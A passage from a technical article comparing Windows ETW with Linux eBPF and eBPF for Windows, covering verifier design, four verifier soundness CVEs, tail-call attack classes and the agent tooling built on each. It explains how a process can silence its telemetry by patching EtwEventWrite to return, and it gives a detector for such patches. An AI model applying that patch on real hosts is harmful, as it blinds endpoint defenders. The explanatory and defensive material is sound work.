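    enum reg_type type;
    int64_t known_value;   /* meaningful only for a constant SCALAR_VALUE */
};

/* After "if (r0 == 0)", refine r0 on each side of the branch. */
static struct reg_state refine_null_check(struct reg_state r0, bool is_null_branch) {
    if (r0.type != PTR_TO_MAP_VALUE_OR_NULL)
        return r0;                                     /* nothing to refine */
    if (is_null_branch)
        return (struct reg_state){ SCALAR_VALUE, 0 };  /* r0 is known NULL */
    return (struct reg_state){ PTR_TO_MAP_VALUE, 0 };  /* qualifier dropped */
}

/* A load of `size` bytes at `off` from r0 is accepted only for a non-null
 * map-value pointer whose access stays inside the map's value. */
static bool check_mem_access(struct reg_state r0, int64_t off, int64_t size,
                             int64_t value_size) {
    if (r0.type != PTR_TO_MAP_VALUE)
        return false;                                  /* e.g. deref before the null check */
    return off >= 0 && size > 0 && off + size <= value_size;
}
```

Dereferencing r0 straight after the lookup is rejected; after the not-taken branch, an 8-byte load at offset 8 of a 16-byte value is accepted, and one at offset 12 is not.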

This path-by-path reasoning is what CVE-2023-2163 undermined. The bug was not in the dereference logic; it was in the state pruning that keeps the verifier's exploration tractable. Once the verifier has proved a program point safe from one abstract state, it prunes later arrivals at that point whose state is equivalent to, or subsumed by, the one already verified. In CVE-2023-2163, missing register precision marks made that equivalence check too permissive: a state that differed from the verified one in a register a later safety check depended on was treated as already verified, so its path was never explored. The program then ran with values the verifier had never checked, and kernel arbitrary read/write followed.
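A simplified sketch of a pruning check for one scalar register, loosely modeled on how the kernel treats scalars (a register not marked "precise" matches any value); the struct and function names are hypothetical. It shows why a missing precision mark is dangerous.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy model of one scalar register in a verifier state. */
struct scalar {
    int64_t min, max;   /* tracked value range */
    bool precise;       /* did a later safety check depend on this range? */
};

/* `old` was already proved safe at this program point; `cur` is a new
 * arrival. Returning true means "prune: do not explore cur". */
static bool scalar_safe_to_prune(struct scalar old, struct scalar cur) {
    if (!old.precise)
        return true;    /* old proof claims it never depended on the range */
    return old.min <= cur.min && cur.max <= old.max;   /* cur within old */
}
```

If the old state's range [0, 7] really did guard an array index but was never marked precise, a new arrival with range [0, 1000] is pruned instead of explored, which is the shape of the bug described above.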

PREVAIL, the abstract-interpretation verifier

PREVAIL [@github-com-ebpf-verifier], published by Gershuni and colleagues at PLDI 2019 [@vbpf-github-io-prevail-paperpdf], takes a structurally different approach. Where Linux's verifier is a heuristic abstract interpreter with a discrete type lattice, PREVAIL uses numerical abstract interpretation over the zone domain plus intervals.

Abstract interpretation is a general framework for static analysis, introduced by Patrick and Radhia Cousot in 1977. The analyzer computes over an *abstract domain* -- intervals, zones, polyhedra, octagons -- rather than concrete program states. A safe abstract operation must over-approximate every possible concrete behavior. The soundness of the analysis reduces to the soundness of the abstract domain operations, which can be proved once and reused.

In the zone domain, the abstract state can express relational constraints between registers and memory base addresses -- not just "register r0 is in [base, base + size)" but "r0 - map_base is in [0, value_size)." That extra expressiveness is what lets PREVAIL prove pointer-arithmetic safety more directly than the Linux verifier's case enumeration. Walking the same null-check program:

Program point	Linux verifier (register lattice)	PREVAIL (zone domain)
After `bpf_map_lookup_elem`	`PTR_TO_MAP_VALUE_OR_NULL`	r0 in {0} U [base, base+sz)
Taken branch (r0 == 0)	refined to NULL	r0 = 0 (equality)
Not-taken branch	`PTR_TO_MAP_VALUE` (qualifier dropped)	r0 - base in [0, sz)
At deref `v->field`	bounds-checked deref	r0 - base in [off, off+access)

Both verifiers accept the program. The difference is in the proof strategy. Linux's verifier reasons case-by-case over a finite lattice; PREVAIL reasons numerically over an abstract domain whose soundness is proved once and reused. The PREVAIL paper (Gershuni et al., PLDI 2019) [@vbpf-github-io-prevail-paperpdf] showed that the zone-domain approach is sound and runs in polynomial time per fixed abstract domain.
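The relational fact in the right-hand column can be sketched as a range on the difference r0 - base. This toy assumes one pointer register, a constant access offset, and no overflow; it is an illustration of the difference-constraint idea, not PREVAIL's implementation, and the names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Toy relational fact "lo <= r0 - base <= hi", the kind of difference
 * constraint a zone domain can hold. */
struct offset_range { int64_t lo, hi; };

/* r0 += k, where k is a scalar known to lie in [klo, khi]. */
static struct offset_range add_scalar(struct offset_range r, int64_t klo, int64_t khi) {
    return (struct offset_range){ r.lo + klo, r.hi + khi };
}

/* An access of `size` bytes at r0 + off is safe iff, for every feasible
 * offset, base <= r0 + off and r0 + off + size <= base + value_size. */
static bool access_in_bounds(struct offset_range r, int64_t off, int64_t size,
                             int64_t value_size) {
    return r.lo + off >= 0 && r.hi + off + size <= value_size;
}
```

Because the fact is stated relative to base, pointer arithmetic simply shifts the range, and the bounds check never needs to know the absolute address of the map value.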

flowchart LR A["r0 := bpf_map_lookup_elem"] B{"r0 == 0?"} C["return 0"] D["return r0->field"] A --> B B -- yes --> C B -- no --> D A -. "Linux: PTR_TO_MAP_VALUE_OR_NULL -- PREVAIL: r0 in {0} U [base, base+sz)" .-> A C -. "Linux: NULL -- PREVAIL: r0 = 0" .-> C D -. "Linux: PTR_TO_MAP_VALUE -- PREVAIL: r0 - base in [0, sz)" .-> D

The trade-off is concrete. PREVAIL accepts a broader class of programs the Linux verifier rejects (some bounded loops, some longer programs), and rejects others the Linux verifier accepts (Linux's heuristic pruning is more aggressive than zone-domain reasoning in some patterns). The contrast is a trade, not a strict ordering. Each verifier is sound with respect to its own abstract domain. The Linux verifier's CVE history is what happens when the domain itself is implemented heuristically rather than from a once-and-for-all soundness proof. The work of Paul Chaignon [@pchaigno-github-io-ebpf-verifierhtml] walks through the architectural differences in more detail.

Four CVEs, one pattern

The Linux verifier has shipped a recurring series of soundness bugs, each one a case where the verifier accepted a program it should have rejected. Four widely disclosed examples:

CVE	Year	Subsystem at fault	Class
CVE-2020-8835 [@nvd-nist-gov-2020-8835]	2020	32-bit register bounds tracking	Out-of-bounds read/write
CVE-2021-3490 [@nvd-nist-gov-2021-3490]	2021	ALU32 bitwise-op bounds tracking	Out-of-bounds R/W, arbitrary code execution in the kernel
CVE-2022-23222 [@nvd-nist-gov-2022-23222]	2022	`*_OR_NULL` type-state tracking	Local privilege escalation via type confusion
CVE-2023-2163 [@nvd-nist-gov-2023-2163]	2023	Branch-pruning logic	Arbitrary kernel R/W

The CVE-2020-8835 NVD entry describes a flaw where the verifier "did not properly restrict the register bounds for 32-bit operations, leading to out-of-bounds reads and writes in kernel memory." CVE-2021-3490, also reported on the NVD, identifies the same class of bug in the bitwise-operation paths. The CVE-2022-23222 record is tracked across the SUSE bug [@bugzilla-suse-com-showbugcgi], Debian DSA-5050 [@debian-org-dsa-5050], and the openwall oss-security disclosure thread [@openwall-com-13-1].

Note: All four CVEs are the same shape: the verifier's abstract state at some program point was narrower than the program's true reachable state, so the verifier proved a property that did not hold. Each fix tightened the abstract operation that introduced the narrowing -- range-tracking for the 2020 and 2021 bugs, type-state for 2022, branch pruning for 2023. None of the fixes were "fix the runtime"; they were all "fix the static analysis." That is exactly the shape Rice's theorem predicts: a heuristic abstract interpreter that occasionally drops information at a join point.

Key idea: The verifier is a research-grade static analyzer running as kernel code. When it gets the abstract domain wrong, the safety guarantee is a CVE. ETW does not have this failure mode because ETW does not run user-supplied code in the kernel.

ETW has driver signing as its safety mechanism. eBPF has the verifier. Microsoft's eBPF-for-Windows project asked an interesting question: what if you want both?

6. eBPF for Windows: The Convergence

On May 10, 2021, Dave Thaler of Microsoft published a blog post announcing a new project. The opening line is the kind of announcement that sounds modest and is not:

"Today we are excited to announce a new Microsoft open source project to make eBPF work on Windows 10 and Windows Server 2016 and later." -- Dave Thaler, "Making eBPF work on Windows" [@cloudblogs-microsoft-com-on-windows], Microsoft Open Source Blog, May 2021

The promise was a near-source-compatible eBPF surface on NT, so that programs and toolchains written for Linux eBPF -- libbpf, bpftool, BCC, clang -target bpf -- would work on Windows with minimal change. The architectural surprise, visible only once you read the design docs, is that the Linux design does not port directly. The Windows trust model is different. The Windows code-integrity story is different. The choices Microsoft made reveal which parts of eBPF are genuinely portable and which parts are deeply Linux-shaped.

Three execution modes

The microsoft/ebpf-for-windows README [@github-com-for-windows] decomposes the runtime into three modes:

Native eBPF program (preferred, HVCI-compatible). PREVAIL verifies the bytecode in user mode. On success, the bpf2c [@github-com-bpf2ctests-expected] tool transliterates each verified BPF instruction to equivalent C, MSVC compiles the C, and the result is a signed .sys kernel driver. The signed driver is what gets loaded into the kernel.
JIT compiler. A user-mode service (eBPFSvc.exe) calls the uBPF [@github-com-iovisor-ubpf] JIT to produce x64 or ARM64 native code, loaded into the kernel-mode execution context. Disabled on HVCI hosts because dynamic code generation cannot be SiPolicy-signed.
Interpreter. uBPF's interpreter, debug-only.

The native mode is the architecturally interesting one. It treats eBPF bytecode as a source language for a signed-driver compile, not as a target for a kernel-mode JIT. The choice is forced by Windows' kernel-mode security model.

Hypervisor-protected Code Integrity (HVCI) is a Windows feature that uses the hypervisor to enforce that only signed code runs in kernel mode. With HVCI on, the kernel will refuse to execute any page that does not match a Code Integrity policy signature. Dynamic code generation -- the kind a JIT does -- is impossible on an HVCI host unless the JIT itself is privileged to bless the pages it produces.

bpf2c: the literal transliterator

The thing that makes the native pipeline work is bpf2c. It takes verified eBPF bytecode and emits portable C that any modern compiler can build into a kernel driver. The transliteration is one bytecode instruction per C statement. A concrete excerpt from droppacket_raw.c [@raw-githubusercontent-com-expected-droppacketrawc], the expected output for the XDP-class droppacket.c [@github-com-sample-droppacketc] sample, shows the shape:

{`
// Excerpt from microsoft/ebpf-for-windows
// tests/bpf2c_tests/expected/droppacket_raw.c
// One verified BPF instruction maps to one C statement.

#pragma code_seg(push, "xdp")
static uint64_t DropPacket(void* context, const program_runtime_context_t* runtime_context)
{
    uint64_t stack[(UBPF_STACK_SIZE + 7) / 8];
    register uint64_t r0 = 0;
    register uint64_t r1 = 0;
    // ... r2 .. r6, r10 declarations ...

    // EBPF_OP_MOV64_REG pc=0 dst=r6 src=r1 offset=0 imm=0
    r6 = r1;
    // EBPF_OP_MOV64_IMM pc=1 dst=r1 src=r0 offset=0 imm=0
    r1 = IMMEDIATE(0);
    // EBPF_OP_STXDW pc=2 dst=r10 src=r1 offset=-8 imm=0
    WRITE_ONCE_64(r10, (uint64_t)r1, OFFSET(-8));

    // ... one C statement per verified BPF instruction ...

    r0 = runtime_context->helper_data[0].address(r1, r2, r3, r4, r5, context);
}
`}

bpf2c is the eBPF-for-Windows transliterator from verified BPF bytecode to portable C suitable for MSVC compilation. The output is a signed-driver source file, one C statement per BPF instruction, that can be compiled and signed through the same pipeline as any other kernel driver. The golden test corpus lives at `microsoft/ebpf-for-windows/tests/bpf2c_tests/expected` [@github-com-bpf2ctests-expected].

Four things stand out in the excerpt. One BPF instruction maps to one C statement; the // EBPF_OP_* comments name the opcode, and the line below it is the equivalent C. The eBPF VM's registers become C uint64_t locals (r0 through r6 and r10 in this program); MSVC's optimizer assigns them to native registers in the final .sys. The #pragma code_seg(push, "xdp") directive names the program section the same way SEC("xdp") does on Linux. And helper calls dispatch through a runtime table -- runtime_context->helper_data[0].address(...) -- so the signed driver remains portable across helper-ABI changes.
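The one-instruction-one-statement shape can be reproduced with a toy emitter. This is not bpf2c's source: it handles only the three opcodes in the excerpt, using their standard BPF encodings (0xbf, 0xb7, 0x7b), and the OP_* names, struct, and function are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define OP_MOV64_REG 0xbf   /* BPF_ALU64 | BPF_MOV | BPF_X */
#define OP_MOV64_IMM 0xb7   /* BPF_ALU64 | BPF_MOV | BPF_K */
#define OP_STXDW     0x7b   /* BPF_STX | BPF_MEM | BPF_DW */

struct insn { uint8_t op, dst, src; int16_t off; int32_t imm; };

/* Emit one C statement for one instruction, in the style of the excerpt.
 * Returns the snprintf result, or -1 for opcodes this toy does not handle. */
static int emit_c(const struct insn *in, char *buf, size_t len) {
    switch (in->op) {
    case OP_MOV64_REG:
        return snprintf(buf, len, "r%u = r%u;",
                        (unsigned)in->dst, (unsigned)in->src);
    case OP_MOV64_IMM:
        return snprintf(buf, len, "r%u = IMMEDIATE(%d);",
                        (unsigned)in->dst, (int)in->imm);
    case OP_STXDW:
        return snprintf(buf, len, "WRITE_ONCE_64(r%u, (uint64_t)r%u, OFFSET(%d));",
                        (unsigned)in->dst, (unsigned)in->src, (int)in->off);
    default:
        return -1;
    }
}
```

Fed the three instructions at pc=0 through pc=2, it reproduces the three C lines in the excerpt. Everything hard about the real tool (helper dispatch, maps, the verifier pass before emission) is outside this sketch.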

The result is a kernel module that is a signed driver in every Windows sense of the term: HVCI checks pass, Kernel Mode Code Integrity (KMCI) [@learn-microsoft-com-downloads-sysmon] is satisfied, the Authenticode chain validates. eBPF-for-Windows native mode does not invent a new in-kernel trust boundary. It composes with the one Windows already has.

flowchart LR A["Restricted C source"] B["clang -target bpf"] C["BPF bytecode"] D["PREVAIL verifier -- (user mode)"] E["bpf2c -- transliterator"] F["Portable C"] G["MSVC compile"] H["Signed .sys driver"] I["Windows kernel -- (HVCI / KMCI)"] A --> B --> C --> D --> E --> F --> G --> H --> I

The verifier moved

The most consequential architectural choice in eBPF-for-Windows is not visible in the binary. PREVAIL does not run inside the kernel. In native mode, verification happens at build time, as part of the bpf2c step, before the generated C is compiled and signed; in JIT mode, PREVAIL runs inside the user-mode eBPFSvc.exe service before the JIT output is handed to the kernel. The kernel never sees an unverified BPF program. By the time anything enters the kernel, it is either a signed driver (native mode) or a JIT-produced buffer that has already passed verification in user space (JIT mode, on non-HVCI hosts).

This is a deliberate divergence from Linux. Linux runs its verifier inside the kernel because the kernel is the only place that can prevent unprivileged user space from loading unsafe programs. Windows can move the verifier out of the kernel because the kernel-mode trust boundary -- the thing that can run -- is already protected by code signing. The verifier becomes a correctness check rather than a safety check at the kernel boundary; safety at the boundary is enforced by HVCI.

Hook coverage as of 2026

The hook surface on Windows is narrower than Linux's. As of 2026, eBPF-for-Windows exposes XDP-class network hooks; BIND, SOCK_OPS, and SOCK_ADDR hooks built on Windows Filtering Platform callouts; and process-creation and process-exit hooks. There is no full kprobe surface. There are no LSM-equivalent hooks. The project README [@github-com-for-windows] describes the project as "work-in-progress." The networking-subset claim in this article is not marketing softening; it is the actual hook list.

The naive model of cross-OS eBPF says: same bytecode runtime, runs on both kernels. The actual model is more subtle and more interesting.

The bytecode is portable because both verifiers accept the same instruction encoding, now standardized at IETF as RFC 9669 [@rfc-editor-org-rfc-rfc9669html]. The verifier is portable because PREVAIL is an abstract interpreter that does not depend on Linux-specific kernel data structures. The runtime is not portable: Linux runs verified bytecode through its in-kernel JIT; Windows transliterates verified bytecode to C and compiles it into a signed driver.
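What both runtimes share is the 64-bit basic instruction layout that RFC 9669 standardizes: an 8-bit opcode, 4-bit destination and source register numbers, a signed 16-bit offset, and a signed 32-bit immediate. A minimal decoder, assuming little-endian encoding (where dst_reg is the low nibble of the register byte); the two test encodings are hand-assembled to match pc=0 and pc=2 of the bpf2c excerpt, not read from the sample's object file.

```c
#include <stdint.h>

/* Decoded fields of a basic 64-bit BPF instruction. */
struct bpf_insn_fields {
    uint8_t opcode, dst_reg, src_reg;
    int16_t offset;
    int32_t imm;
};

/* Decode 8 little-endian bytes: opcode, regs (src high nibble, dst low
 * nibble), 16-bit offset, 32-bit immediate. */
static struct bpf_insn_fields decode_le(const uint8_t b[8]) {
    struct bpf_insn_fields f;
    f.opcode  = b[0];
    f.dst_reg = b[1] & 0x0f;
    f.src_reg = b[1] >> 4;
    f.offset  = (int16_t)(uint16_t)(b[2] | (b[3] << 8));
    f.imm     = (int32_t)((uint32_t)b[4] | ((uint32_t)b[5] << 8) |
                          ((uint32_t)b[6] << 16) | ((uint32_t)b[7] << 24));
    return f;
}
```

The bytes bf 16 00 00 00 00 00 00 decode to MOV64_REG with dst r6 and src r1, and 7b 1a f8 ff 00 00 00 00 decode to STXDW with dst r10, src r1, and offset -8: the same fields the bpf2c comments print.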

So the cross-platform abstraction is the verifier, not the runtime. PREVAIL is the contract; each OS lifts verified bytecode into its own trust model. Linux trusts the verifier's output enough to JIT it in kernel mode; Windows distrusts in-kernel dynamic code by policy and lifts the verified bytecode out through a signed-driver compile. The portability boundary moved from "same VM" to "same static analysis," and that is the architectural insight that makes the project work.

Key idea: The runtime is not the cross-platform abstraction. The verifier is. PREVAIL is the contract; each OS lifts verified bytecode into its own trust model -- in-kernel JIT on Linux, signed-driver compile on Windows. eBPF-for-Windows is not "same kernel hook, different OS"; it is "same bytecode contract, different OS-specific lifting."

Cross-OS eBPF works for the networking subset today. The general kernel observability case -- arbitrary kprobes, full LSM hooks, deep process introspection -- is still Linux-only because the hooks themselves are Linux-internal. eBPF-for-Windows is a real convergence, but it is a subset convergence. Section 7 zooms out and compares the two designs across the full set of dimensions practitioners actually use to choose.

7. Head-to-Head: Performance and Trust Models

Two designs. One emits, one computes. Practitioners need to know what each one costs, where each one's edges cut, and what attack classes each design enables. The right form for that comparison is a table.

Dimension	ETW	Linux eBPF	eBPF for Windows	DTrace
In-kernel filter language	None (level + keyword mask only)	Verified bytecode	Verified bytecode	D scripting language
In-kernel aggregation	None	Maps (per-CPU and shared)	Maps	Aggregations primitive
Producer per-event cost	Constant: format + memcpy to per-CPU buffer	JIT-compiled native code at hook	JIT or signed-driver call at hook	Probe handler call
Verifier	Driver signing only	Linux in-kernel heuristic verifier	PREVAIL in user mode + KMCI	In-kernel DIF validator (D compiles to DIF, which has no backward branches)
Verifier soundness incidents	Not applicable	Recurring CVEs (four 2020-2023 examples in section 5)	None disclosed	None
Hook coverage	Universal across Windows API surface	Universal: kprobe, uprobe, tracepoint, XDP, TC, LSM, sched	XDP, BIND, SOCK_OPS, SOCK_ADDR, process	Solaris/BSD/macOS provider set
Cross-platform	Windows only	Linux only	Source-compatible with Linux subset	Solaris, FreeBSD, macOS (legacy)
Transport	Per-CPU ring buffer, .etl files	Ringbuf, perf_event_array, maps	Ringbuf, maps	Per-CPU buffers
Trust model	Manifest registration + driver signing	Verifier + CAP_BPF + CAP_PERFMON	Verifier + HVCI + driver signing	Privilege check + safe-by-construction
Adoption pattern	Defender, Sysmon, CrowdStrike, SentinelOne, Carbon Black	Cilium, Falco, Tetragon, Tracee, Pixie, Sysmon for Linux	Pre-production; Azure test deployments	Solaris/macOS legacy + bpftrace via inspiration
Best suited for	Forensic capture across the entire Windows API surface	Hot-path filtering and aggregation with arbitrary kernel hooks	Cross-platform networking observability	Interactive debugging on Solaris-lineage systems

The asymptotic argument

Two designs can be compared asymptotically. ETW carries N events of average size S; the kernel-to-user wire cost is Omega(NS) -- the unavoidable lower bound for streaming N events. eBPF can reduce that to O(M) where M is the aggregation size, for workloads that aggregate before the events cross the boundary. The bpftrace histogram from section 4 is the concrete example: vfs_read can fire ten million times per second while the user-side bandwidth is zero, because the per-CPU histogram never crosses the boundary until print time.
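A back-of-envelope version of that comparison follows. Every input is an assumption chosen for illustration: 64-byte events at ten million per second for streaming, and a 64-entry map of 16-byte entries on 96 CPUs read once per second for aggregation.

```c
#include <stdint.h>

/* Streaming: every event crosses the boundary, so cost scales with N * S. */
static uint64_t stream_bytes_per_sec(uint64_t events_per_sec, uint64_t bytes_per_event) {
    return events_per_sec * bytes_per_event;
}

/* Aggregating: only the map crosses, once per read, independent of N.
 * A per-CPU map returns one copy of each entry per CPU. */
static uint64_t aggregate_bytes_per_sec(uint64_t entries, uint64_t bytes_per_entry,
                                        uint64_t ncpus, uint64_t reads_per_sec) {
    return entries * bytes_per_entry * ncpus * reads_per_sec;
}
```

Under those assumptions streaming moves 640,000,000 bytes per second, while the aggregated read moves 98,304 bytes per second, and only the first number grows with the event rate.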

The asymmetry is the entire reason eBPF makes sense for high-frequency telemetry. It is also why so many cloud-native observability tools built since 2018 run on eBPF. When the producer rate exceeds the user-space consumption rate, you do not have a choice: you either drop events or aggregate them in-kernel. ETW can drop. Only eBPF can aggregate.

The tail-call attack class

bpf_tail_call(ctx, &prog_array, index) is powerful and its power has structural consequences. From the BPF trampoline v3 cover letter [@lore-kernel-org-1-astkernelorg-2], the kernel team is explicit that the trampoline was designed in part as a replacement for tail-call-based chaining: "In many cases it can be used as a replacement for bpf_tail_call-based program chaining." The motivation is structural -- there are three attack classes implicit in the tail-call mechanism, and the trampoline avoids them.

Branch-target injection on the tail-call dispatcher. Pre-mitigation kernels exposed an indirect branch from kernel mode -- the dispatcher selecting its target from a user-controllable prog_array index. That is exactly the shape of a Spectre-v2 gadget. Mitigation: retpolined dispatcher and the BPF trampoline replacement that avoids the indirect branch entirely.

The qualitative reason fentry beats kprobe is not a benchmark; it is the avoidance of a retpoline. The v3 patch cover letter spells this out: "To avoid the high cost of retpoline the attached BPF programs are called directly." Real numbers vary by microarchitecture, retpoline implementation, and the rest of the kernel-build configuration, but the structural reason is the same on every machine.

Recursion-bound bypass. The 33-call cap protects the verifier's termination proof for a single program from being bypassed by chaining, but it is a per-execution counter. A sequence of attached programs at different attach points can still produce arbitrary aggregate work. The mitigation lives in per-event scheduling, not in the verifier.

Speculative type confusion. The verifier proves a single program's register-type invariants. The target of a tail call is selected at runtime from a map, so the CPU can speculatively run a different program under the calling program's type state. Mitigation: indirect-call hardening shared with the rest of the kernel.

flowchart LR
A["Calling BPF program"]
B["bpf_tail_call(ctx, &arr, idx)"]
C["JIT dispatcher -- (indirect jump)"]
D{"Map slot at idx"}
E["Target BPF program"]
F["Speculative path -- (wrong target)"]
G["Retpoline / BPF trampoline -- (direct call)"]
A --> B --> C --> D
D -- correct --> E
D -. speculative .-> F
G -. mitigation .-> C
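The recursion-bound item above hinges on the cap being per execution. A toy Python model of the dispatch rules shows the effect. It is an illustration, not kernel code: the program table, the exception used to model a non-returning jump, and the program names are hypothetical, while the fall-through cases (index out of range, empty slot, exhausted counter) and the cap of 33 follow the documented `bpf_tail_call` behavior and the text.

```python
MAX_TAIL_CALL_CNT = 33  # per-execution cap on tail calls, as in the text


class _TailCallJump(Exception):
    """Models a successful tail call: control never returns to the caller."""

    def __init__(self, target):
        super().__init__()
        self.target = target


def run(prog_array, entry, ctx):
    """Run one execution (one event) starting at prog_array[entry].

    Returns (return_value, programs_executed).
    """
    tail_call_cnt = 0  # reset for every execution, i.e. for every event
    executed = 0

    def bpf_tail_call(index):
        # Each failure case falls through: the calling program keeps running.
        if not 0 <= index < len(prog_array):
            return
        if tail_call_cnt >= MAX_TAIL_CALL_CNT:
            return
        target = prog_array[index]
        if target is None:
            return
        raise _TailCallJump(target)

    current = prog_array[entry]
    while True:
        executed += 1
        try:
            return current(ctx, bpf_tail_call), executed
        except _TailCallJump as jump:
            tail_call_cnt += 1
            current = jump.target


def looping_prog(ctx, tail_call):
    """A program that tries to tail-call itself forever."""
    ctx["work"] += 1
    tail_call(0)
    return 0  # reached only once the tail call falls through


if __name__ == "__main__":
    ctx = {"work": 0}
    for _event in range(1000):
        run([looping_prog], 0, ctx)
    print(ctx["work"])  # bounded per event, but grows with the number of events
```

Each event performs 34 program executions (the entry program plus 33 tail calls), so 1,000 events perform 34,000: the cap bounds one execution, not the aggregate work across events.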

The ETW user-mode bypass

ETW has its own structural attack class, mentioned in section 3 and worth restating in the trust-model context. A process that wants to silence its own ETW emissions can patch ntdll!EtwEventWrite to a ret instruction in its own address space. The kernel buffer never sees the event. EDR vendors monitor for this integrity violation out of band, and use the patch itself as a high-confidence detection signal.
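The integrity check EDRs run for this patch can be sketched as a byte comparison between the in-memory prologue of EtwEventWrite and a known-good copy, for example one read from ntdll.dll on disk. A minimal Python sketch under explicit assumptions: how the two byte strings are obtained is out of scope, the 16-byte window is an arbitrary choice, and the stub list covers only a few common x64 encodings (`C3` is `ret`, `C2 imm16` is `ret imm16`, `33 C0 C3` and `31 C0 C3` are `xor eax, eax; ret`, `48 33 C0 C3` is `xor rax, rax; ret`).

```python
WINDOW = 16  # assumption: number of prologue bytes to compare

# A few common x64 "return immediately" stubs used to silence EtwEventWrite.
RET_STUBS = (
    bytes.fromhex("c3"),          # ret
    bytes.fromhex("33c0c3"),      # xor eax, eax ; ret
    bytes.fromhex("31c0c3"),      # xor eax, eax ; ret (alternate encoding)
    bytes.fromhex("4833c0c3"),    # xor rax, rax ; ret
)


def classify_prologue(live: bytes, known_good: bytes) -> str:
    """Compare the live prologue against a known-good copy.

    Returns "intact", "ret-stub" (patched to return immediately), or
    "modified" (changed some other way, e.g. a jump to a hook).
    """
    live, known_good = live[:WINDOW], known_good[:WINDOW]
    if live == known_good:
        return "intact"
    # 0xC2 is `ret imm16`; the others are matched as exact byte prefixes.
    if live[:1] == b"\xc2" or any(live.startswith(stub) for stub in RET_STUBS):
        return "ret-stub"
    return "modified"
```

Treating any mismatch as a signal, and a ret-stub as a high-confidence one, mirrors the text's point that the patch itself is the detection.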

Note: Because ETW's emission path runs in the calling process's own address space, the deeper question is whether any user-mode emission primitive can be tamper-resistant under hostile user-mode code. The current answer is "no": the mitigation has been to move the trust boundary into the kernel, via PPL, the kernel-only Threat-Intelligence provider, and (on Linux) LSM hooks that observe mprotect and image-load operations directly.

Trust models, side by side

ETW trusts manifest registration plus Code Integrity for kernel drivers. The kernel only emits events; the only adversary-controllable surface is the user-mode provider, and the integrity-violation tell catches the obvious attack.

Linux eBPF trusts the verifier plus CAP_BPF and CAP_PERFMON. The verifier is the kernel-mode safety boundary; capabilities gate who can load programs at all. The verifier has been the source of soundness CVEs, and permissive load policy has been the path to exploiting them. Defense in depth: unprivileged eBPF off by default since 5.16, hardening of the indirect-call dispatcher, ongoing verifier work.

eBPF for Windows trusts PREVAIL plus HVCI driver signing. The verifier runs in user mode; the kernel only ever sees a signed driver or a JIT-emitted buffer that has already passed the verifier. The composition is strictly more conservative than Linux eBPF, because it stacks the verifier on top of the signing model rather than replacing it. Microsoft is using the Windows kernel-mode trust mechanism and adding the eBPF verifier to it, not choosing between them.

The next layer up from the kernel substrate is the consumer layer -- the agents and SIEM pipelines practitioners actually ship. That production stack determines which substrate they reach for first.

8. Production Adoption: The Agent Layer

The substrate matters because the consumer stack does. On Linux, eBPF is the foundation of every serious cloud-native security and observability project. On Windows, ETW plays the same role. The portable subset is small but real, and it is growing.

The Linux side

Cilium [@cilium-io] is the dominant eBPF-based networking project, CNCF-graduated [@falco-org-docs] and shipping Kubernetes cluster networking, NetworkPolicy enforcement, and a service mesh implementation. Falco [@falco-org], originally created by Sysdig and now CNCF-graduated, provides eBPF-based runtime threat detection driven by a rules engine. Tetragon [@tetragon-io-docs-overview], a Cilium subproject, attaches eBPF programs to kprobes and LSM hooks for in-kernel enforcement -- not just observation but the ability to block. Tracee [@github-com-aquasecurity-tracee] from Aqua Security is an eBPF runtime security tool. Pixie [@docs-px-dev], originally Pixie Labs and now under New Relic, uses eBPF for auto-instrumentation of services running in Kubernetes.

Sysmon for Linux [@github-com-microsoft-sysmonforlinux] is the most architecturally interesting member of the list. Microsoft, the company that built ETW and Sysmon, ported Sysmon to Linux by replacing the ETW back end with eBPF kprobes via the SysinternalsEBPF library. The XML configuration schema and Event IDs are preserved, so SOC analysts see the same event schema from either OS. It is the production demonstration that ETW and eBPF can be made surface-equivalent to a consumer.

The Windows side

Sysmon [@learn-microsoft-com-downloads-sysmon] is the canonical ETW consumer reference design, authored by Mark Russinovich and Thomas Garnier and free from Microsoft. Microsoft Defender for Endpoint [@learn-microsoft-com-defender-endpoint] is the commercial Microsoft EDR product, ETW-driven and cloud-connected. CrowdStrike Falcon, SentinelOne, and Carbon Black are the major third-party EDRs; all of them consume ETW alongside their own kernel-mode sensors. krabsetw [@github-com-microsoft-krabsetw] is Microsoft's C++ ETW consumer library; the Microsoft.Diagnostics.Tracing.TraceEvent package is the .NET equivalent.

The toolchain layer

The eBPF world comes with a toolchain that does not have a direct ETW counterpart. libbpf [@github-com-libbpf-libbpf] is the canonical C library for loading and managing eBPF programs. bpftool [@github-com-libbpf-bpftool] is the inspection utility. BCC [@github-com-iovisor-bcc] is the older Python-binding toolkit. bpftrace [@github-com-iovisor-bpftrace] is the DSL inspired by DTrace. cilium/ebpf [@github-com-cilium-ebpf] is the Go library; aya [@github-com-rs-aya] and libbpf-rs [@github-com-libbpf-rs] are the Rust libraries. The toolchain coverage tells you something about the substrate: a Go developer can write an eBPF program and have it loaded by their existing service binary, because the load-verify-attach lifecycle has a Go binding.

ETW has its own toolchain -- tracerpt.exe, Windows Performance Analyzer, BenchmarkDotNet, krabsetw -- but the toolchain is shaped around consuming events, not around emitting programs into the kernel. The asymmetry of the toolchains mirrors the asymmetry of the substrates.

The decision guide

**Windows EDR or building on Microsoft Defender for Endpoint.** Use ETW plus Sysmon plus the `Microsoft-Windows-Threat-Intelligence` provider (whose consumers must run as Antimalware-PPL). eBPF for Windows is not yet a substitute for Defender-grade kernel telemetry; the hook surface is too narrow.

**Linux runtime-security or cluster networking.** Use eBPF. Pick libbpf or cilium/ebpf for the language binding. Attach LSM hooks for enforcement; fentry for observability. The verifier will fight you; that is expected.

**Cross-platform networking observability with one source surface.** Use eBPF for Windows and Linux eBPF together, restricted to the XDP, SOCK_ADDR, SOCK_OPS, and BIND hooks. The Linux source compiles unchanged on Windows for this subset.

**Forensic capture across the full Windows API surface.** Use ETW into .etl files, analyzed in Windows Performance Analyzer. Nothing else covers that breadth on Windows.

Note: The Sysmon-for-Linux case study is the cleanest practical justification for the abstract-surface convergence. If your SIEM consumes Sysmon XML and matches on Event ID and field, you can run a fleet of Windows hosts on ETW and Linux hosts on eBPF, and for the event types both ports emit, the SIEM will not know the difference. The substrate is invisible at the consumer's contract; what matters is that the contract is preserved across the back-end change. This is the production realization of the engineering pattern -- different mechanisms, identical schemas -- that the rest of the article has been describing in architectural terms.
